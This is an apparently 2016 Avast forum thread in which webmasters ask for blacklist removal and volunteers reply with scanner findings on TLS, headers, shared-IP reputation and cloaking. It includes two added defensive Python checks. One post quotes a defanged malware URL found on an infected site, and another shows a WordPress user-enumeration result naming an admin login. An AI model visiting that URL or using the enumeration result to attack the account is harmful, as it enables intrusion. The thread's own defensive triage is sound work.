Suspicious code (could be harmful) :
http://quttera.com/detailed_report/allonltd.com.ua

Suspicious script and error page :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=allonltd.com.ua

Outdated software used :
https://sitecheck.sucuri.net/results/allonltd.com.ua

IDS on the same IP :
http://urlquery.net/report.php?id=1459279177548

Missing security settings in the header(s) :
https://securityheaders.io/?q=allonltd.com.ua

JQuery security problems :
http://retire.insecurity.today/#!/scan/14f10850f7ddda03e8b13df03c20debbb8383f4e99ebb28b04bceeb3d2dc586e

It would not surprise me if avast has found more problems than the ones I listed here.

Oh, thank you for your answer, I will resolve these problems, and if avast continues to block sites, I'll reply to you.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 29, 2016, 11:36:50 PM
I just checked and avast does not block the site anymore.

If it says otherwise on your system it is likely avast's cache that needs to be refreshed.
- disable the shields
- wait e.g. 5 minutes
- enable them again
- check if avast is still blocking the site on your system
or
reboot your system

And yes, please resolve the things I mentioned.
As you (should and likely do) know often security issues are fixed in newer versions of software.
Using old server and CMS software makes your site not as secure as it can/should be. ;)
Title: Re: How to remove my website from your blacklist?
Post by: st0rm on March 31, 2016, 11:22:12 PM
My website is currently being blocked by Avast : snaphack.org

We checked the site with the following, all showing no problems:

https://www.virustotal.com/fr/url/b0ec3ecb0a96427af6b5967241e2d6edd52cb4302c98ebfaf7b0257a6d569a8f/analysis/1459459194/
https://sitecheck.sucuri.net/results/snaphack.org/

Thanks in advance
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on March 31, 2016, 11:31:14 PM
URL:Mal = IP and/or Domain is blacklisted

Blacklisted / malicious :
https://www.virustotal.com/en/ip-address/185.66.140.181/information/
http://zulu.zscaler.com/submission/show/fce4102e88c49146458ddf46027a649b-1459459444
https://www.virustotal.com/en/url/b0ec3ecb0a96427af6b5967241e2d6edd52cb4302c98ebfaf7b0257a6d569a8f/analysis/
http://multirbl.valli.org/lookup/185.66.140.181.html

JQuery security risks :
http://retire.insecurity.today/#!/scan/f9429df8a4d3a8684f32a45eb9c0956e58809e1d66ff5ac7289160d0c3a5d5e6
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 31, 2016, 11:59:23 PM
Apart from what Eddy mentions in his report, pay attention to the following finds:

Server header security certainly not optimal with a meagre F-Status: https://securityheaders.io/?q=snaphack.org
Nameserver is DROWN vulnerable: https://test.drownattack.com/?site=ns13.knownsrv.com

snaphack.org

Please contact the Certificate Authority for further verification.
You have 1 error
Wrong certificate installed.
The domain name does not match the certificate common name or SAN.
Warnings
BEAST
The BEAST attack is not mitigated on this server.
RC4
This server uses the RC4 cipher algorithm which is not secure. Disable the RC4 cipher suite and update the server software to support the Advanced Encryption Standard (AES) cipher algorithm. Contact your web server vendor for assistance.
SSLv3
This server uses the SSLv3 protocol which is not secure. Disable the SSLv3 protocol and enable a higher protocol version. Contact your web server vendor for assistance.
Root installed on the server.
For best practices, remove the self-signed root from the server.
Certificate revocation check failed.
Try the certificate installation check again.
This server is vulnerable to:
Poodle (SSLv3)
This server is vulnerable to a Poodle (SSLv3) attack. If you have not disabled SSLv3 fallback support, disable it now and use TLS 1.2 or higher.
Certificate information
This server uses an Organizationally Validated (OV) certificate. Information about the site owner has been validated by Locivir to help secure personal and financial information.
Common name: calendar.locivir.com
SAN:
Valid from: 2016-Jan-09 20:24:02 GMT
Valid to: 2017-Jan-08 20:24:02 GMT
Certificate status: Check failed
Revocation check method: Not available
Organization: Locivir
Organizational unit: Calendar
City/locality: Montreal
State/province: Quebec
Country: CA
Certificate Transparency: Not Enabled
Serial number: 02
Algorithm type: MD5withRSA
Key size: 2048

Re: http://toolbar.netcraft.com/site_report?url=snaphack.org  Yahoo abuse!

There is always the possibility the website comes malware free or detection could be a FP. The vulnerabilities and insecurities should be mitigated however asap.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 01, 2016, 09:47:49 AM
<title>Pirater un compte snapchat 2016
En: Hack an account Snapchat 2016

I think this will stay blocked...
Title: Re: How to remove my website from your blacklist?
Post by: fernando231 on April 06, 2016, 04:26:07 AM
Hi, I'm Fernando, I'm the webmaster of www.universoarmas.com.ar. The site seems to be blacklisted in avast. We had an issue a few months ago; I check the site every week and I can't find any problem, but the site is not removed from the blacklist. I run several online checks and no errors/malware/viruses were found. Can someone help me and point out the problem on the site in order to fix it? Thanks in advance.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on April 06, 2016, 07:20:09 AM
Quote
Hi, I'm Fernando, I'm the webmaster of www.universoarmas.com.ar. The site seems to be blacklisted in avast. We had an issue a few months ago; I check the site every week and I can't find any problem, but the site is not removed from the blacklist. I run several online checks and no errors/malware/viruses were found. Can someone help me and point out the problem on the site in order to fix it? Thanks in advance.
On two blacklists here
https://virustotal.com/en/url/73fe97d5f6e71fe7b7e2b9d9247b41aa670ea95a0f092f648b135015868554a1/analysis/1459919865/

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on April 06, 2016, 08:02:27 AM
I removed universoarmas.com.ar from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: karlh74 on April 14, 2016, 02:14:21 PM
Hi,

Our website www.emailmarketingdesign.co.uk appears on your phishing blacklist.

It's not a phishing website so can you please get this removed asap.

Many thanks,

Karl
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 14, 2016, 02:50:15 PM
You are wrong.

1] avast doesn't have a phishing blacklist.
2] avast is currently not blocking the site.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 15, 2016, 12:03:05 AM
Well, there is a problem with that domain name
Quote
This domain cannot be registered because it contravenes the Nominet UK
naming rules. The reason is: the domain name contains too many parts. 
For some issues see: https://seomon.com/domain/www.emailmarketingdesign.co.uk/ssl/
Certificate Not Matches Server Hostname.
The address you entered is unnecessarily exposing the following response headers which divulge its choice of web platform:

Server: nginx/1.8.1
Configuring the application to not return unnecessary headers keeps this information silent and makes it significantly more difficult to identify the underlying frameworks.

18 errors and 8 warnings for the code here: https://seomon.com/domain/www.emailmarketingdesign.co.uk/html_validator/

Insecure IDs tracking: 50% of the trackers on this site could be protecting you from NSA snooping.
Tell emailmarketingdesign.co.uk to fix it.

Missing security headers and accordingly a meagre F-Status: https://securityheaders.io/?q=http%3A%2F%2Fwww.emailmarketingdesign.co.uk

However the SRI hash scan delivers a full A Status: https://sritest.io/#report/2650bde7-90a4-4bd6-8b0e-abfe0804ac40

Third party suspicious web rep: https://www.mywot.com/en/scorecard/emailmarketingdesign.co.uk?utm_source=addon&utm_content=rw-viewsc

Nameserver vulnerable to DROWN: https://test.drownattack.com/?site=ns1.hostmonster.com
Comodo Certificate seems correctly installed.

Certificate chain
COMODO RSA Certification Authority - Intermediate certificate
COMODO RSA Domain Validation Secure Server CA - Intermediate certificate
*.hostmonster.com - Tested certificate.

polonus (volunteer website security analyst and website error-hunter)
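A way to check the two header findings in the post above (a version-bearing Server header and missing security headers) against a captured response head. This is an added example, not part of the original thread or of any scanner linked in it; the baseline header list, the function names and the sample responses are assumptions, and only the `Server: nginx/1.8.1` value is taken from the post.

```python
import re

# Headers this sketch expects on every response. The selection is an
# assumption of the example, not the grading scheme of any scanner.
BASELINE = (
    "content-security-policy",
    "x-frame-options",
    "x-content-type-options",
    "strict-transport-security",  # browsers honour it on HTTPS only
)
# Headers whose mere presence names the platform behind the site.
PLATFORM_HEADERS = ("x-powered-by", "x-aspnet-version", "x-generator")
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")
MAX_AGE_RE = re.compile(r'max-age\s*=\s*"?(\d+)', re.I)


def parse_head(raw):
    """Split a raw response head into (status_line, {lowercase name: [values]})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def audit(raw, https):
    """Return missing baseline headers, platform disclosure and weak values."""
    _, headers = parse_head(raw)
    missing = [h for h in BASELINE
               if h not in headers
               and (https or h != "strict-transport-security")]

    disclosed = []
    for value in headers.get("server", []):
        if VERSION_RE.search(value):       # "nginx" alone is not flagged
            disclosed.append("server: " + value)
    for name in PLATFORM_HEADERS:
        for value in headers.get(name, []):
            disclosed.append(name + ": " + value)

    weak = []
    for value in headers.get("x-content-type-options", []):
        if value.lower() != "nosniff":     # the only defined value
            weak.append("x-content-type-options: " + value)
    for value in headers.get("strict-transport-security", []):
        m = MAX_AGE_RE.search(value)
        if not m or int(m.group(1)) == 0:  # max-age=0 switches HSTS off
            weak.append("strict-transport-security: " + value)
    return {"missing": missing, "disclosed": disclosed, "weak": weak}


# Constructed sample response heads. Only the Server line of BEFORE comes
# from the post above; everything else is made up for the example.
BEFORE = """\
HTTP/1.1 200 OK
Server: nginx/1.8.1
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.4.45
"""

# What the same site could return after hardening (nginx prints a bare
# "Server: nginx" when server_tokens is off).
AFTER = """\
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src 'self'
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
"""

if __name__ == "__main__":
    print("before:", audit(BEFORE, https=False))
    print("after: ", audit(AFTER, https=True))
```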
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on April 15, 2016, 12:23:44 AM
<snip>
Our website wXw.emailmarketingdesign.co.uk appears on your phishing blacklist.

It's not a phishing website so can you please get this removed asap.
<snip>

As Eddy mentions - I'm not getting any blocking or alerts - avast 2016 11.2.2261 and firefox 45.0.2.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 15, 2016, 12:38:45 AM
Neither have I, but I would pay attention to the Nominet alert and look into this issue.
Also the WOT third party web rep alerts need to be analyzed.
Avast is not blacklisting and the website is not malicious per se.
You do not score a miserable F-Status here, but a slightly better E-Status:
https://securityheaders.io/?q=https%3A%2F%2Fwww.rightscale.com%2F

polonus
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on April 15, 2016, 01:13:14 AM
Quote
Neither have I, but I would pay attention to the Nominet alert and look into this issue.
Also the WOT third party web rep alerts need to be analyzed.
Avast is not blacklisting and the website is not malicious per se.
You do not score a miserable F-Status here, but a slightly better E-Status:
https://securityheaders.io/?q=https%3A%2F%2Fwww.rightscale.com%2F

polonus

@ polonus
Whilst it is certainly something which the site should consider, the point in question is avast blocking or alerting on the site, which it isn't.

@ Eddy & karlh74
As far as phishing goes, the avast browser add-on AOS (Avast Online Security) does look out for phishing sites. But the AOS rating for the site doesn't mention that.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 15, 2016, 06:42:22 AM
Hi DavidR,

Well, read what I said there earlier
Quote
neither have I
meaning that I haven't experienced Avast blocking or alerting on the aforementioned site. So the question was answered by me. Additional info is just informative and to the benefit of the site-owner.

polonus
Title: Re: How to remove my website http://nontonindramaonline.com from your blacklist?
Post by: Surya13 on May 16, 2016, 06:03:05 PM
Hey, dear webmaster, my website http://nontonindramaonline.com/ is clean of malware, please unblock my website.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 16, 2016, 06:18:20 PM
Blacklisted :
http://zulu.zscaler.com/submission/show/3b5d837397b7a504e8005d629956ad26-1463413853
http://quttera.com/labs-data-url/nontonindramaonline.com

Phishing detected :
https://www.virustotal.com/en/url/d3e9ce41bdebec909960a07f6fa8c1d02cdcd24af8119aefd9c63dd1462b8246/analysis/1463414914/
http://www.urlvoid.com/scan/nontonindramaonline.com/
https://sitecheck.sucuri.net/results/nontonindramaonline.com
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 16, 2016, 06:52:39 PM
Checking for cloaking
There is a difference of 32 bytes between the version of the page you serve to Chrome and the version you serve to GoogleBot. This probably means some code is running on your site that's trying to hide from browsers but make Google think there's something else on the page: http://isithacked.com/check/http%3A%2F%2Fnontonindramaonline.com%2F%20
See F-Status here: https://securityheaders.io/?q=http%3A%2F%2Fnontonindramaonline.com%2F

Various issues: https://sritest.io/#report/13e32453-51fd-491b-b16c-b41da6e1b6c4

jQuery libraries are secure...some blockable scripts for script- and ad-blockers detected.

WordPress: check on plug-in:    js_composer

PHP vulnerability: http://www.ubuntu.com/usn/usn-2952-1/  (take up with Cloudflare)...


polonus (volunteer website security analyst and website error-hunter)
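The cloaking check quoted above compares what the same URL returns to a browser and to a crawler. The sketch below is an added example, not part of the original thread and not the code of the linked checker: it diffs two response bodies after masking values that legitimately change per request, so only content served to one client remains. The sample pages, the injected link and all names are constructed; the 32-byte difference is chosen to mirror the figure in the post.

```python
import difflib
import re

# Values that differ on every request and must not count as cloaking.
# The patterns are assumptions matching the constructed pages below.
VOLATILE = (
    (re.compile(r'(name="csrf_token" value=")[0-9a-f]+(")'), r"\g<1>TOKEN\g<2>"),
)
# Crawler-only markup that deserves a look first: links, scripts, frames.
SUSPICIOUS_RE = re.compile(r"<\s*(?:a|script|iframe)\b", re.I)
TOKEN_RE = re.compile(r"<[^>]+>|[^<]+")   # whole tags or the text between them


def normalize(html):
    """Mask per-request values so they do not show up in the diff."""
    for pattern, repl in VOLATILE:
        html = pattern.sub(repl, html)
    return html


def cloaking_report(browser_body, crawler_body, normalize_volatile=True):
    """Compare the body served to a browser with the one served to a crawler."""
    delta = len(crawler_body.encode("utf-8")) - len(browser_body.encode("utf-8"))
    if normalize_volatile:
        browser_body, crawler_body = normalize(browser_body), normalize(crawler_body)
    a = TOKEN_RE.findall(browser_body)
    b = TOKEN_RE.findall(crawler_body)
    # Diff on tag/text tokens: a character diff can split an inserted tag
    # across two opcodes and report a rotated fragment.
    matcher = difflib.SequenceMatcher(None, a, b, autojunk=False)
    browser_only, crawler_only = [], []
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag in ("replace", "delete"):
            browser_only.append("".join(a[i1:i2]))
        if tag in ("replace", "insert"):
            crawler_only.append("".join(b[j1:j2]))
    return {
        "byte_delta": delta,
        "browser_only": browser_only,
        "crawler_only": crawler_only,
        "suspicious": [f for f in crawler_only if SUSPICIOUS_RE.search(f)],
    }


# Constructed sample: the same page as two clients would receive it. In
# practice the two bodies come from fetching one URL with a browser and a
# crawler User-Agent string.
_PAGE = (
    '<html><head><title>Drama list</title></head>\n'
    '<body><form><input type="hidden" name="csrf_token" value="{token}"></form>\n'
    '<p>Latest episodes</p>{extra}\n'
    '</body></html>\n'
)
INJECTED = '<a href="//x.example/">promo</a>'   # 32 bytes, crawler only
BROWSER_BODY = _PAGE.format(token="9f3a77c1", extra="")
CRAWLER_BODY = _PAGE.format(token="04be21d8", extra=INJECTED)

if __name__ == "__main__":
    report = cloaking_report(BROWSER_BODY, CRAWLER_BODY)
    print("byte delta:", report["byte_delta"])
    for fragment in report["suspicious"]:
        print("served to crawler only:", fragment)
```

Without the normalisation step the per-request token shows up as a second difference, which is why a byte count on its own is only a hint and the differing fragments need to be read.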
Title: Re: How to remove my website from your blacklist?
Post by: djshorty on May 21, 2016, 07:53:35 PM
My website filmoljupci.com is blacklisted.
my site is clean and safe
http://www.urlvoid.com/scan/filmoljupci.com/
https://www.virustotal.com/en/url/83f48e57534186103cac0e4be91c94e232acc214c574e42b5f4d6a2991d06a93/analysis/1463853088/
so please remove it from blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 21, 2016, 08:04:38 PM
IP history  https://www.virustotal.com/nb/ip-address/213.174.157.150/information/
click more button under list(s) for more info
Multiple domains on same IP and many are blacklisted


IPvoid > http://www.urlvoid.com/ip/213.174.157.150
Quote
IP ADDRESS: 213.174.157.150

We have found in our database of already analyzed websites that there are 91 websites hosted in the same web server with IP address 213.174.157.150 and IP hostname dev150.ucoz.net. Remember that it is not good to have too many websites located in the same web server because if a website gets infected by malware, it can easily affect the online reputation of the IP address and also of all the other websites.




Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 21, 2016, 08:23:23 PM
Lots of suspicious things, likely links to blacklisted sites/IP's.
Iframes are deprecated since HTML version 4.01 and obsolete since version 5 :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=filmoljupci.com

Blacklisted sites/links on that ASN :
http://urlquery.net/report.php?id=1463853205832
http://urlquery.net/report.php?id=1463853277447

Huge amount of malicious sites/files on that IP (as Pondus already said) :
https://www.virustotal.com/en/ip-address/213.174.157.150/information/

Insecure headers :
https://securityheaders.io/?q=filmoljupci.com

JQuery vulnerabilities :
http://retire.insecurity.today/#!/scan/9f35e7d10a3bb40a2cd091f3984ffe65d1cb8d20996ad1560c4ce5685a7f559a

SSL/TLS issues :
https://www.ssllabs.com/ssltest/analyze.html?d=filmoljupci.com&ignoreMismatch=on&latest

Blacklisted IP (for very good reasons) :
http://zulu.zscaler.com/submission/show/9b3cf2cff66b4f3e90921de6ddff7b9f-1463854191
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 21, 2016, 11:13:56 PM
Yep Eddy, all true what you report, but there is also a hidden iFrame <iframe id="mchatIfm2" style="width:100%;height:300px" frameborder="0" scrolling="auto" hspace="0" vspace="0" allowtransparency="true" src="/mchat/"></iframe>  sidebar chat is a nuisance, no malware of course....larin-chat-brbljaonica but it has 100% IDS tracking insecurity. Let them make it more secure.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: djshorty on May 22, 2016, 08:25:12 PM
I have fixed the problem with the chat in the sidebar; now only logged-in users can see it.
And that website is created in the ucoz website builder,
ucoz.com, so all those websites hosted on 213.174.157.150 that are blacklisted are not mine and I can't fix that.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 22, 2016, 08:51:28 PM
Your only chance is to ask an Avast Team Member to throw an exclusion for your website domain on that general blocking of the baddies there.
We cannot help you as we are volunteers with relevant knowledge and only Avast Team Members can unblock. Wait for an Avast Team Member to reply here in this thread and you may be lucky. I have PM-ed him.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 22, 2016, 08:54:30 PM
Get dedicated hosting.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 23, 2016, 09:05:56 AM
filmoljupci.com/publ removed from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: User5247 on May 27, 2016, 04:39:20 AM
Hello, Avast is blocking the majority of the posts of my adult site http://streamjav.org/. I have scanned the site on multiple malware-check pages and the result was that the site is clean, but avast continues blocking the content, specifically posts with the tag jav, minimum, lolita. So what is wrong?
Thank you.-
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 27, 2016, 08:56:23 AM
streamjav.org unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 27, 2016, 09:08:35 AM
There is however a setup problem on that site.
Keeps giving the error flash srcnotfound
Title: Re: How to remove my website from your blacklist?
Post by: postmaster8 on June 15, 2016, 06:00:14 PM
My website www.france-choroideremie.org is blacklisted.
But now my site is clean and safe

https://www.virustotal.com/fr/url/97b62dc7b1a5b69b13b301db376d182cfd4ecdbfeda26f8012a2fa884161ccc9/analysis/

so please remove it from blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on June 15, 2016, 06:04:37 PM
-> https://sitecheck.sucuri.net/results/www.france-choroideremie.org/
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 15, 2016, 06:12:10 PM
Yup, we did spot malware on it 2 weeks ago: france-choroideremie[.]org/counter/?ad=1bh52yqdx22ecanmhw4pitfrbpufnfcphj&ky=olrn969fejpp24c92ys5yiycijpn2umtvcnt&id=y5pjzaa6rhr1mywndiiabyzwrmbcpou6hedhfqkcpedltvgn2qupuoiuzclu5juzqbnnrfv16uhsfihxbrlq26eokkhr0q&rnd=02

I hope the infection has been healed already, so I am unblocking it now.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 15, 2016, 06:19:33 PM
Although the malware on france-choroideremie.org is gone, there is still the issue of outdated software that needs to be fixed.
Title: Re: How to remove my website from your blacklist?
Post by: patrickruizflores on June 18, 2016, 12:29:04 PM
Hello, my website www.pronunciaciones.com has been blacklisted since Jun 17th, 2016. I did everything I could to fix the issues. Could you take it off the blacklist please? Maybe I missed something. It'd be great if you could give me some advice about it. Thank you.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 18, 2016, 12:36:06 PM
Quote
I did everything I could to fix the issues
No, you did not.
You didn't even do the most important thing.
Stepping away from GoDaddy.
https://forum.avast.com/index.php?topic=187562.msg1319445#msg1319445
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 18, 2016, 12:43:35 PM
I removed the block on pronunciaciones.com ;) However, as Eddy pointed out, there have been a lot of malicious domains on the same IP recently, which might indicate a server security breach...
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 10:00:44 PM
My site is being blocked: www.sonjiniportreti.com, which redirects to my hosting sonjiniportreti.thats.im (free googiehost company). Can anyone help me please? I went on virustotal, and the site was clean

https://www.virustotal.com/en/url/7b115b4d7b09ed673b2e65f71bc9df480b4a42d3ae33595c4484aaf0f360fa6f/analysis/1467056294/

https://www.virustotal.com/en/url/6908fd5bb5a06d18450ed0c1ba05706121d788c3bf8b88c1012b9dd9b38f7b5b/analysis/1467057571/
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 27, 2016, 10:05:30 PM
Quote
I went on virustotal, and the site was clean
Virustotal does not scan the website, it checks the URL against blacklists

sonjiniportreti.thats.im/wp/  >>  https://safeweb.norton.com/report/show?url=sonjiniportreti.thats.im

IP history:
https://www.virustotal.com/en/ip-address/74.208.236.17/information/

https://www.virustotal.com/en/ip-address/206.72.206.123/information/

Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 10:09:55 PM
Those 2 subdomains aren't mine  :(

Threat Report
Security Risks
Threats found: 1 
Here is a complete list: (for more information about a specific threat, click on the Threat Name below)

Threat Name:
Web Attack: Malicious Toolkit Iframe Injection
Location:
http://dorybi.thats.im/sa/hes/13/sprej-losen-dlya-ukrepleniya-i-rost.php

Phishing Attacks
Threats found: 1 
Here is a complete list: (for more information about a specific threat, click on the Threat Name below)

Location:
http://serve.thats.im/login

So if I completely remove that free subdomain, and use only my .com, I will be safe?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 27, 2016, 10:14:04 PM
Quote
So if I completely remove that free subdomain, and use only my .com, I will be safe?
@HonzaZ is notified, he is the one with all the answers

Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 10:21:18 PM
Quote
So if I completely remove that free subdomain, and use only my .com, I will be safe?
@HonzaZ is notified, he is the one with all the answers

Thanks, I'm just realising how this works. It seems like I'm hurt by other users on the same server IP, and other users in the same "thats.im" domain. I'll need advice on whether leaving this free hosting company is the only choice to avoid further problems. But if this kind of thing happens on other hostings too, moving is pointless?
Title: Re: How to remove my website from your blacklist?
Post by: Secondmineboy on June 27, 2016, 10:48:37 PM
Quote
So if I completely remove that free subdomain, and use only my .com, I will be safe?
@HonzaZ is notified, he is the one with all the answers

Thanks, I'm just realising how this works. It seems like I'm hurt by other users on the same server IP, and other users in the same "thats.im" domain. I'll need advice on whether leaving this free hosting company is the only choice to avoid further problems. But if this kind of thing happens on other hostings too, moving is pointless?

Moving isn't totally pointless; a VPS or server is always best. It is harder to maintain, but in exchange you get more control over security and privacy, of course.

You can stay at the same company you use right now, being Interserver (in case that's correct); they also have VPSes and dedicated servers, and I guess they can help you with setting up and moving over.

Otherwise maybe you can check out OVH as hosting company or STRATO (Germany), HostEurope (Germany), Hetzner Online GmbH (Germany), Online.net or MyVirtualServer (small company from Germany, good support and pretty cheap VPSes).

As web server I recommend NGINX (FREE) or LiteSpeed (free or paid depending on version).

The OS mostly used is Linux; which one is up to you. Debian or CentOS are the most widely used ones on servers. DON'T FORGET TO SECURE THEM.
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 11:00:49 PM
Thanks Steven for your elaborate opinion. I was a fool for believing I can have a site for free.  :'(
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on June 27, 2016, 11:15:13 PM
Quote
Thanks Steven for your elaborate opinion. I was a fool for believing I can have a site for free.  :'(
Google Sites is free and has worked for me. :)
Title: Re: How to remove my website from your blacklist?
Post by: Secondmineboy on June 27, 2016, 11:47:52 PM
Quote
Thanks Steven for your elaborate opinion. I was a fool for believing I can have a site for free.  :'(

Well, you can have sites for free; the problem is that these are shared, so you have one server that hosts dozens of sites, and when one site on that server is malicious, some AVs and security software start blocking the IP and therefore ANY site on that one server.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 27, 2016, 11:57:15 PM
The shared IP domain status with the risk of being blocked,
because of bad-behaving neighbours is always existing.
Free has always come "at a price".
If that is allright for you and you do not mind, then it works for you.
On their Google monoculture platforms that price has a name and is called "AdMob",
showing personalised ads, and when developers won't pay that price,
then their apps won't get allowed into the Google webshop.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 28, 2016, 12:01:43 AM
Quote
Thanks Steven for your elaborate opinion. I was a fool for believing I can have a site for free.  :'(

Well, you can have sites for free; the problem is that these are shared, so you have one server that hosts dozens of sites, and when one site on that server is malicious, some AVs and security software start blocking the IP and therefore ANY site on that one server.

Exactly. There goes credibility out of the window. You can't have people trust your site when it's flagged as infected. I can't show the site to friends and mention every time what false positive means. I had the idea that only load time or uptime would be affected with 0 price. Not the complete disaster of a red flag horn saying I'm trying to trick my friends.
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 28, 2016, 12:16:10 AM
Quote
The shared IP domain status with the risk of being blocked,
because of bad-behaving neighbours is always existing.
Free has always come "at a price".
If that is allright for you and you do not mind, then it works for you.
On their Google monoculture platforms that price has a name and is called "AdMob",
showing personalised ads, and when developers won't pay that price,
then their apps won't get allowed into the Google webshop.

polonus
I expected that "price" would be ninja ads or something like that. So I checked from several IPs and was happy to find none. I knew "free" would bite me very soon, just didn't know how.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 28, 2016, 07:32:17 AM
Looks to me the problem is really easy to solve.
Don't use frames.
Frames were deprecated in HTML-4 and are obsolete in HTML-5
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 28, 2016, 09:15:19 AM
Quote
@HonzaZ is notified, he is the one with all the answers
I wish :D

Anyway, we block whole "thats.im", I can see a couple hundred subdomains on that domain and most of them are randomly generated, therefore highly suspicious.
The fact that we haven't been contacted by anyone else in the 6 months we have been blocking it also indicates that there are not many legit sites.

I suggest moving to another hosting. As others pointed out, dedicated (or at least paid) hostings usually have much better quality, but I think for a small website and a small number of visitors, some (other) free one might be suitable as well... Good luck ;)!
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 30, 2016, 04:37:16 AM
I rehosted my site. http://s633037578.onlinehome.us/ Is this whitelisted? It seems so.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 30, 2016, 10:26:39 AM
There is malicious activity detected on that ASN :
http://urlquery.net/report.php?id=1467274091340
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 30, 2016, 12:12:53 PM
Also your WordPress settings are insecure: Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   fragmaster   fragmaster
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Re: http://toolbar.netcraft.com/site_report?url=http://s633037578.onlinehome.us

SRI Hash status A = OK, this here has a meagre F-Status: https://securityheaders.io/?q=http%3A%2F%2Fs633037578.onlinehome.us%2F&followRedirects=on

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: miguel167 on June 30, 2016, 05:37:16 PM
Hello.

I have a little Magento ecommerce site, http://ribastiendaonline.com. One month ago it was hacked but now it is clean. I noticed that Avast users get a warning. I think my website is clean now. Can you give feedback so I know what the problem is?

Thank you so much!

Regards
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 30, 2016, 05:49:02 PM
On several blacklists
https://www.virustotal.com/en/url/e63b70fa6cc84825d0a16382f01a86b6e11fe4e81b7592d52521bfcbcba23951/analysis/1467301648/

urlvoid  >>  http://www.urlvoid.com/scan/ribastiendaonline.com/

IP history  >>  https://www.virustotal.com/en/ip-address/185.92.247.46/information/

Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 30, 2016, 06:44:46 PM
According to Phishcheck it is likely a PHISH: http://phishcheck.me/9065/details
Libraries detected to be retired: http://retire.insecurity.today/#!/scan/e12b8002b9d04fab2d2b1e90ce7b92ab3d9d06650448ada69a4ed03130e6e4c9

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on July 01, 2016, 01:53:38 PM
Quote
Also your WordPress settings are insecure: Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   fragmaster   fragmaster
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Re: http://toolbar.netcraft.com/site_report?url=http://s633037578.onlinehome.us

SRI Hash status A = OK, this here has a meagre F-Status: https://securityheaders.io/?q=http%3A%2F%2Fs633037578.onlinehome.us%2F&followRedirects=on

polonus (volunteer website security analyst and website error-hunter)
If I'm supposed to hunt loopholes and spend more time securing the web site than making it, what's the point.
I'll do some research and fix what I can.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on July 01, 2016, 02:06:03 PM
Keeping a site secure and bug free is part of having a website.
A website is not a "set and forget" thing.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 01, 2016, 02:09:21 PM
Quote
Keeping a site secure and bug free is part of having a website.
A website is not a "set and forget" thing.
+1
